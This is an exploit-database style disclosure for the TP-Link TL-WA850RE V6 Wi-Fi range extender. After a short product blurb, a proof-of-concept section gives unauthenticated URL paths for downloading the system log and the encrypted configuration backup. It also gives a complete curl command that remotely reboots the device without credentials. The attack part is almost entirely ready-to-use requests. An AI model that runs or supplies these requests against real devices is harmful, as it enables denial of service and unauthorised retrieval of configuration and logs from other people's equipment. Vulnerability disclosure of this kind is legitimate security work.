TP-Link TL-WA850RE V6 – Unauthenticated Remote Reboot

Authors:Wadeek               Risk:High

CVE:NO                      0day:Unauthenticated

0day -id:0DAY-176103         Date:2018-04-27

Overview

The 300Mbps Wi-Fi Range Extender connects to your router wirelessly,
strengthening and expanding its signal into areas it can’t reach on its own,
achieving speed of 300Mbps.

The Intelligent Signal lights help you quickly find the best location to install the
range extender.

POC

# Exploit Title: TP-Link Technologies TL-WA850RE Wi-Fi Range Extender | Unauthorized Remote Reboot
# Date: 25/04/2018
# Exploit Author: Wadeek
# Vendor Homepage: https://www.tp-link.com/
# Firmware Link: https://www.tp-link.com/en/download/TL-WA850RE.html
# Category: dos

:System Log:
/data/systemlog.txt?operation=save
 
:Encrypted Configuration File:
/data/config.bin?operation=backup
 
:Reboot:
curl --silent 'http://[IP]/data/reboot.json' -H 'Host: [IP]' -H 'Accept: application/json, text/javascript, */*;' --compressed -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Cookie: COOKIE=' -H 'Connection: keep-alive' --data 'operation=write'

Leave a Reply